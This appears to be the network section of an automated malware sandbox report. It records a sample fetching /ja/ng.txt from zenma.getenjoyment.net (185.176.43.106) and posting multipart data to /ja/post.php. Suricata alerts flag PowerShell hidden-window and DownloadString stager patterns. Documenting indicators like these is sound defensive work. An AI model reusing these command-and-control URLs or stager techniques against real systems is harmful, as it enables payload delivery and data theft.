Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| zenma.getenjoyment.net | 185.176.43.106 |
GET
200
http://zenma.getenjoyment.net/ja/ng.txt
REQUEST
RESPONSE
BODY
GET /ja/ng.txt HTTP/1.1
Host: zenma.getenjoyment.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 03 Aug 2021 05:13:32 GMT
Server: Apache
Last-Modified: Mon, 02 Aug 2021 00:21:19 GMT
ETag: "1201-5c8888c5a3056"
Accept-Ranges: bytes
Content-Length: 4609
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
POST
100
http://zenma.getenjoyment.net/ja/post.php
REQUEST
RESPONSE
BODY
POST /ja/post.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----MD5AHRE7932DDKSLIEJDKF
Host: zenma.getenjoyment.net
Content-Length: 16977
Expect: 100-continue
HTTP/1.1 100 Continue
POST
100
http://zenma.getenjoyment.net/ja/post.php
REQUEST
RESPONSE
BODY
POST /ja/post.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----MD5AHRE7932DDKSLIEJDKF
Host: zenma.getenjoyment.net
Content-Length: 268
Expect: 100-continue
HTTP/1.1 100 Continue
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 185.176.43.106:80 -> 192.168.56.102:49166 | 2026989 | ET INFO PowerShell Hidden Window Command Common In Powershell Stagers M1 | A Network Trojan was detected |
| TCP 185.176.43.106:80 -> 192.168.56.102:49166 | 2026995 | ET INFO PowerShell DownloadString Command Common In Powershell Stagers | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts